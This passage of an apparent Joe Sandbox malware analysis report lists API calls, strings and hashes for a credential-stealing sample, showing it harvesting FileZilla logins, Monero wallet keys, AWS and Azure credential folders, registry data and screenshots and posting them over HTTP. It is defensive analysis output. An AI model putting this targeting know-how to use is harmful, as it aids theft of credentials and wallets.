                                        • lstrcat.KERNEL32(?,00000000), ref: 007C06F3
                                        • lstrcat.KERNEL32(?,007D1770), ref: 007C0702
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C0715
                                        • lstrcat.KERNEL32(?,007D1774), ref: 007C0724
                                        • lstrcat.KERNEL32(?,login: ), ref: 007C0733
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C0746
                                        • lstrcat.KERNEL32(?,007D1780), ref: 007C0755
                                        • lstrcat.KERNEL32(?,password: ), ref: 007C0764
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C0777
                                        • lstrcat.KERNEL32(?,007D1790), ref: 007C0786
                                        • lstrcat.KERNEL32(?,007D1794), ref: 007C0795
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C07EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 1942843190-555421843
                                        • Opcode ID: 153ce46066d8deaaccb12393b5b6f08aa83fef703ca5838b53f7f9f5a5320638
                                        • Instruction ID: 372bff652a47c012383efa48b082a54e13933bda0c92d54126d2e2ea0ddf7f94
                                        • Opcode Fuzzy Hash: 153ce46066d8deaaccb12393b5b6f08aa83fef703ca5838b53f7f9f5a5320638
                                        • Instruction Fuzzy Hash: 49D120B1A10208FBCB04EBE0DD9AFEE7739AF14305F50855DF102661A5EF38AA45CB65
                                        Function 007B59B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007B4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007B4889
                                          • Part of subcall function 007B4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 007B4899
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007B5A48
                                        • StrCmpCA.SHLWAPI(?,0165F1C0), ref: 007B5A63
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007B5BE3
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0165F2C0,00000000,?,0165E5B8,00000000,?,007D1B4C), ref: 007B5EC1
                                        • lstrlen.KERNEL32(00000000), ref: 007B5ED2
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 007B5EE3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007B5EEA
                                        • lstrlen.KERNEL32(00000000), ref: 007B5EFF
                                        • lstrlen.KERNEL32(00000000), ref: 007B5F28
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007B5F41
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 007B5F6B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 007B5F7F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 007B5F9C
                                        • InternetCloseHandle.WININET(00000000), ref: 007B6000
                                        • InternetCloseHandle.WININET(00000000), ref: 007B600D
                                        • HttpOpenRequestA.WININET(00000000,0165F380,?,0165ECD0,00000000,00000000,00400100,00000000), ref: 007B5C48
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                        • InternetCloseHandle.WININET(00000000), ref: 007B6017
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 874700897-2180234286
                                        • Opcode ID: 16792f4259e5f45da63d79fa819468de1cc85fb8811dc52850eb5d30098f9e20
                                        • Instruction ID: 5a8c03ac76fead945547e936e24917ad701c77109eb2ffa4c8e902e1fa80a168
                                        • Opcode Fuzzy Hash: 16792f4259e5f45da63d79fa819468de1cc85fb8811dc52850eb5d30098f9e20
                                        • Instruction Fuzzy Hash: 5F12C8B192011CFBCB15EBA0DCAAFEEB379AF14705F00419DB10662191EF786E49CB65
                                        Function 007BCFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007C8CF0: GetSystemTime.KERNEL32(007D0E1B,0165E2E8,007D05B6,?,?,007B13F9,?,0000001A,007D0E1B,00000000,?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007C8D16
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007BD083
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007BD1C7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007BD1CE
                                        • lstrcat.KERNEL32(?,00000000), ref: 007BD308
                                        • lstrcat.KERNEL32(?,007D1570), ref: 007BD317
                                        • lstrcat.KERNEL32(?,00000000), ref: 007BD32A
                                        • lstrcat.KERNEL32(?,007D1574), ref: 007BD339
                                        • lstrcat.KERNEL32(?,00000000), ref: 007BD34C
                                        • lstrcat.KERNEL32(?,007D1578), ref: 007BD35B
                                        • lstrcat.KERNEL32(?,00000000), ref: 007BD36E
                                        • lstrcat.KERNEL32(?,007D157C), ref: 007BD37D
                                        • lstrcat.KERNEL32(?,00000000), ref: 007BD390
                                        • lstrcat.KERNEL32(?,007D1580), ref: 007BD39F
                                        • lstrcat.KERNEL32(?,00000000), ref: 007BD3B2
                                        • lstrcat.KERNEL32(?,007D1584), ref: 007BD3C1
                                        • lstrcat.KERNEL32(?,00000000), ref: 007BD3D4
                                        • lstrcat.KERNEL32(?,007D1588), ref: 007BD3E3
                                          • Part of subcall function 007CAB30: lstrlen.KERNEL32(007B4F55,?,?,007B4F55,007D0DDF), ref: 007CAB3B
                                          • Part of subcall function 007CAB30: lstrcpy.KERNEL32(007D0DDF,00000000), ref: 007CAB95
                                        • lstrlen.KERNEL32(?), ref: 007BD42A
                                        • lstrlen.KERNEL32(?), ref: 007BD439
                                          • Part of subcall function 007CAD80: StrCmpCA.SHLWAPI(00000000,007D1568,007BD2A2,007D1568,00000000), ref: 007CAD9F
                                        • DeleteFileA.KERNEL32(00000000), ref: 007BD4B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                        • String ID:
                                        • API String ID: 1956182324-0
                                        • Opcode ID: 6c36a2c8d67d5b95a567be5efa9330b4cb9e4bd2492b9510668b94330ce48503
                                        • Instruction ID: 08636a8eb8e097572efbeea7ef13bf98958c6961dbe083537e56927c6de22002
                                        • Opcode Fuzzy Hash: 6c36a2c8d67d5b95a567be5efa9330b4cb9e4bd2492b9510668b94330ce48503
                                        • Instruction Fuzzy Hash: E0E1FCB1910108EBCB14EBE0DD9AFEE7339AF54306F10455DF107661A1EE39AE09CB66
                                        Function 007BCA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0165D098,00000000,?,007D1544,00000000,?,?), ref: 007BCB6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 007BCB89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 007BCB95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 007BCBA8
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 007BCBD9
                                        • StrStrA.SHLWAPI(?,0165D050,007D0B56), ref: 007BCBF7
                                        • StrStrA.SHLWAPI(00000000,0165D170), ref: 007BCC1E
                                        • StrStrA.SHLWAPI(?,0165DB20,00000000,?,007D1550,00000000,?,00000000,00000000,?,01658AB8,00000000,?,007D154C,00000000,?), ref: 007BCDA2
                                        • StrStrA.SHLWAPI(00000000,0165D9E0), ref: 007BCDB9
                                          • Part of subcall function 007BC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 007BC971
                                          • Part of subcall function 007BC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 007BC97C
                                        • StrStrA.SHLWAPI(?,0165D9E0,00000000,?,007D1554,00000000,?,00000000,01658AE8), ref: 007BCE5A
                                        • StrStrA.SHLWAPI(00000000,01658A18), ref: 007BCE71
                                          • Part of subcall function 007BC920: lstrcat.KERNEL32(?,007D0B47), ref: 007BCA43
                                          • Part of subcall function 007BC920: lstrcat.KERNEL32(?,007D0B4B), ref: 007BCA57
                                          • Part of subcall function 007BC920: lstrcat.KERNEL32(?,007D0B4E), ref: 007BCA78
                                        • lstrlen.KERNEL32(00000000), ref: 007BCF44
                                        • CloseHandle.KERNEL32(00000000), ref: 007BCF9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                        • String ID:
                                        • API String ID: 3744635739-3916222277
                                        • Opcode ID: ec61d59d2f613c576db77b4f25beae4be0505c4bae58a9c1405663cd0d9a74db
                                        • Instruction ID: 7294dc5eb60fa3c6c8002fb3ce7aaf6a398d61f73d8733f5c125d3c0021e5d16
                                        • Opcode Fuzzy Hash: ec61d59d2f613c576db77b4f25beae4be0505c4bae58a9c1405663cd0d9a74db
                                        • Instruction Fuzzy Hash: 63E1D5B2910108FBCB14EFA4DCAAFEEB779AF54305F00419DF10666191EF386A49CB65
                                        Function 007C84B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • RegOpenKeyExA.ADVAPI32(00000000,0165B948,00000000,00020019,00000000,007D05BE), ref: 007C8534
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 007C85B6
                                        • wsprintfA.USER32 ref: 007C85E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 007C860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C8629
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?
                                        • API String ID: 3246050789-3278919252
                                        • Opcode ID: 06ebe2f1dc06a31cbc464310f0f25e217ad4c15603559302078588c2fa6f9870
                                        • Instruction ID: 4662f802b0ce77930a095974031bc31367c2f2abdf1ebef39f301a01c8c6746d
                                        • Opcode Fuzzy Hash: 06ebe2f1dc06a31cbc464310f0f25e217ad4c15603559302078588c2fa6f9870
                                        • Instruction Fuzzy Hash: 90811AB191011CABDB24DF90CD95FEAB7B8BB08704F1082DCA109A6190DF74AF85CFA5
                                        Function 007C91A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007C91FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: `d|F$`d|F$image/jpeg
                                        • API String ID: 2244384528-1389507572
                                        • Opcode ID: 576e87e77b2e4d68ef70bc3b536633dcc19bd713749b596d4a4c8ba791c668ce
                                        • Instruction ID: 77bcd7bcd431959182ca7df8cda5e35d9de991cea23d6ffb19636b7d569e9b3c
                                        • Opcode Fuzzy Hash: 576e87e77b2e4d68ef70bc3b536633dcc19bd713749b596d4a4c8ba791c668ce
                                        • Instruction Fuzzy Hash: BE71A771A14208EBDB14DBE4DC99FEEB778AB48700F608508F616A7290EB74E905CB61
                                        Function 007C4FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007C8F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C5000
                                        • lstrcat.KERNEL32(?,\.azure\), ref: 007C501D
                                          • Part of subcall function 007C4B60: wsprintfA.USER32 ref: 007C4B7C
                                          • Part of subcall function 007C4B60: FindFirstFileA.KERNEL32(?,?), ref: 007C4B93
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C508C
                                        • lstrcat.KERNEL32(?,\.aws\), ref: 007C50A9
                                          • Part of subcall function 007C4B60: StrCmpCA.SHLWAPI(?,007D0FC4), ref: 007C4BC1
                                          • Part of subcall function 007C4B60: StrCmpCA.SHLWAPI(?,007D0FC8), ref: 007C4BD7
                                          • Part of subcall function 007C4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 007C4DCD
                                          • Part of subcall function 007C4B60: FindClose.KERNEL32(000000FF), ref: 007C4DE2
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C5118
                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 007C5135
                                          • Part of subcall function 007C4B60: wsprintfA.USER32 ref: 007C4C00
                                          • Part of subcall function 007C4B60: StrCmpCA.SHLWAPI(?,007D08D3), ref: 007C4C15
                                          • Part of subcall function 007C4B60: wsprintfA.USER32 ref: 007C4C32
                                          • Part of subcall function 007C4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 007C4C6E
                                          • Part of subcall function 007C4B60: lstrcat.KERNEL32(?,0165F200), ref: 007C4C9A
                                          • Part of subcall function 007C4B60: lstrcat.KERNEL32(?,007D0FE0), ref: 007C4CAC
                                          • Part of subcall function 007C4B60: lstrcat.KERNEL32(?,?), ref: 007C4CC0
                                          • Part of subcall function 007C4B60: lstrcat.KERNEL32(?,007D0FE4), ref: 007C4CD2
                                          • Part of subcall function 007C4B60: lstrcat.KERNEL32(?,?), ref: 007C4CE6
                                          • Part of subcall function 007C4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 007C4CFC
                                          • Part of subcall function 007C4B60: DeleteFileA.KERNEL32(?), ref: 007C4D81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
